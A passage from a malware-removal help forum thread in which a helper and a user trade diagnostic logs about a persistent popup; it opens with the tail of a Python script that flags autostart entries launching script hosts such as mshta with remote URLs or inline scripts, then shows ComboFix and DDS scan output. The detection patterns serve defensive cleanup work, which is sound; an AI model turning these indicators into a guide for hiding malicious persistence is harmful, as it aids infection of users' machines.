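        end = cmd.find('"', 1)
        exe = cmd[1:end] if end > 0 else cmd[1:]
    else:                                         # unquoted path, may contain spaces
        m = re.match(r"(?i)(.+?\.exe)(?:\s|$)", cmd)
        exe = m.group(1) if m else (cmd.split()[0] if cmd else "")
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def looks_random(name):
    """True for a long mixed-case alphanumeric run with digits (generated names)."""
    for run in re.findall(r"[A-Za-z0-9]+", name):
        if (len(run) >= 20 and re.search(r"\d", run)
                and re.search(r"[a-z]", run) and re.search(r"[A-Z]", run)):
            return True
    return False


def triage_entry(name, command):
    """Return the reasons an autostart entry deserves a look (empty list if none)."""
    reasons = []
    exe = image_name(command)
    if exe in SCRIPT_HOSTS:
        urls = URL_RE.findall(command)
        if urls:
            hosts = sorted({urlparse(u).hostname or "?" for u in urls})
            reasons.append(f"{exe} launched with remote URL ({', '.join(hosts)})")
        if INLINE_RE.search(command):
            reasons.append(f"{exe} launched with inline script")
    if looks_random(name):
        reasons.append("value name looks machine-generated")
    return reasons


def triage(dump_text):
    """Parse a dump and return the flagged entries with their reasons."""
    findings = []
    for key, name, cmd in parse_run_entries(dump_text):
        reasons = triage_entry(name, cmd)
        if reasons:
            findings.append({"key": key, "name": name, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_DUMP):
        print(f'{f["key"]}\\{f["name"]}')
        for r in f["reasons"]:
            print("   -", r)
```

The same checks apply to scheduled tasks and to live process command lines (the first post's Process Explorer view already showed `mshta.exe http://...`), and the URL host is the indicator worth blocking at the proxy or DNS layer while the Run values are removed; note that Malwarebytes or ComboFix removing the values does not stop a second loader that re-creates them, which is why the popup can return.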


----------



## gagraptor (May 23, 2012)

ComboFix 12-05-29.01 - GAGAN 05/29/2012 23:51:22.3.2 - x86
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.927 [GMT -4:00]
Running from: c:\users\GAGAN\Desktop\ComboFix.exe
Command switches used :: c:\users\GAGAN\Desktop\CFScript.txt
AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\system32\drivers\etc\hosts.ics
.
.
((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-30 )))))))))))))))))))))))))))))))
.
.
2012-05-30 04:03 . 2012-05-30 04:05	--------	d-----w-	c:\users\GAGAN\AppData\Local\temp
2012-05-30 04:03 . 2012-05-30 04:03	--------	d-----w-	c:\users\Default\AppData\Local\temp
2012-05-30 03:44 . 2012-05-30 03:44	29904	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\MpKsl5ae50f1e.sys
2012-05-29 18:04 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0D65DCBB-645F-4F85-8BC7-9E0E1CE17186}\mpengine.dll
2012-05-29 03:00 . 2012-05-08 13:40	6737808	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2012-05-22 05:16 . 2012-05-22 05:16	713784	------w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
2012-05-22 05:09 . 2012-05-22 05:10	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 05:43 . 2012-05-19 09:50	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57 . 2012-03-20 23:28	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57 . 2012-03-30 12:39	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57 . 2012-03-29 13:39	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57 . 2012-02-01 15:10	1404928	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
2012-05-14 22:57 . 2012-02-01 15:10	936960	----a-w-	c:\program files\Common Files\Microsoft Shared\ink\journal.dll
2012-05-14 22:57 . 2012-02-29 13:41	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57 . 2012-03-01 14:46	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57 . 2012-02-29 14:08	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57 . 2012-03-01 14:46	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:57 . 2012-02-29 13:44	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:56 . 2012-04-03 08:16	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56 . 2012-04-03 08:16	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-09 04:58 . 2012-05-09 04:58	592824	----a-w-	c:\program files\Mozilla Firefox\gkmedias.dll
2012-05-09 04:58 . 2012-05-09 04:58	44472	----a-w-	c:\program files\Mozilla Firefox\mozglue.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2012-05-08 16:40 . 2012-05-19 08:37	6737808	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
2012-05-05 06:08 . 2012-04-07 05:22	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-05-05 06:08 . 2011-06-14 22:11	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-04-04 19:56 . 2010-02-20 07:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-04-02 13:36 . 2012-05-14 22:56	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-03-21 00:44 . 2012-03-21 00:44	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44 . 2012-03-21 00:44	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
2012-05-09 04:58 . 2011-06-08 03:45	97208	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
2011-05-09 08:49	176936	----a-w-	c:\program files\uTorrentControl\prxtbuTor.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
"{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
.
[HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
"Skytel"="Skytel.exe" [2007-05-29 1826816]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
"00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
"TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
"DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
backup=c:\windows\pss\Metacafe.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
\HWSetup.exe hwSetUP [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
2011-12-13 04:20	3305760	----a-w-	c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28	59240	----a-w-	c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40	413696	----a-w-	c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39	16040	----a-w-	c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39	672424	----a-w-	c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00	188928	----a-w-	c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22	3739648	----a-w-	c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49	55416	----a-w-	c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09	421736	----a-w-	c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14	34352	----a-w-	c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08	1062184	----a-w-	c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22	2785608	----a-w-	c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28	421888	----a-w-	c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11	4489216	----a-w-	c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39	1826816	----a-w-	c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46	448632	----a-w-	c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33	49664	----a-w-	c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35	90112	----a-w-	c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42	438272	----a-w-	c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36	1451304	----a-w-	c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39	411192	----a-w-	c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11	2648184	----a-w-	c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation	REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-30 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-30 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-30 00:09
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ... 
.
scanning hidden autostart entries ... 
.
scanning hidden files ... 
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\MsMpEng.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\agrsmsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\windows\system32\rundll32.exe
c:\windows\System32\tcpsvcs.exe
c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
c:\windows\system32\TODDSrv.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\program files\TeamViewer\Version6\TeamViewer.exe
c:\program files\Synaptics\SynTP\SynToshiba.exe
c:\program files\iPod\bin\iPodService.exe
c:\windows\system32\mshta.exe
c:\program files\Synaptics\SynTP\SynTPHelper.exe
c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
c:\windows\system32\mshta.exe
.
**************************************************************************
.
Completion time: 2012-05-30 00:16:00 - machine was rebooted
ComboFix-quarantined-files.txt 2012-05-30 04:15
ComboFix2.txt 2012-05-29 18:01
ComboFix3.txt 2012-05-29 02:55
.
Pre-Run: 29,436,858,368 bytes free
Post-Run: 29,280,116,736 bytes free
.
- - End Of File - - 443FBEB5CCBB3C0435B8375034C71986


----------



## gagraptor (May 23, 2012)

The popup is still there, not gone yet.


----------



## Mark1956 (May 7, 2011)

Ok, the Combofix log is not showing any further entries relating to the popup. Please run both Malwarebytes and DDS again and post the logs; that should show us what has been missed.


----------



## gagraptor (May 23, 2012)

Also, when I run ComboFix I get a message that says pev.3xe and pev.exe have stopped working.

P.S. I reran ComboFix as I forgot Defogger; I edited the last log.


----------



## Mark1956 (May 7, 2011)

I still need to see the logs asked for in my last post. Please don't edit logs in previous posts, as I may need to refer back to them, or run repeat scans when I have not requested them.

Defogger only needs to be run once to disable any CD emulation software, it does not need to be run every time you use Combofix. Any emulation software will remain disabled until Defogger is run again and set to re-enable them.

Please continue with running Malwarebytes and DDS and post the logs.

The pev.exe and pev.3xe files are part of Combofix but it can run ok without them. If any other error messages pop up please tell me.


----------



## gagraptor (May 23, 2012)

.
DDS (Ver_2011-08-26.01) - NTFSx86 
Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
Run by GAGAN at 0:39:32 on 2012-05-31
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1121 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
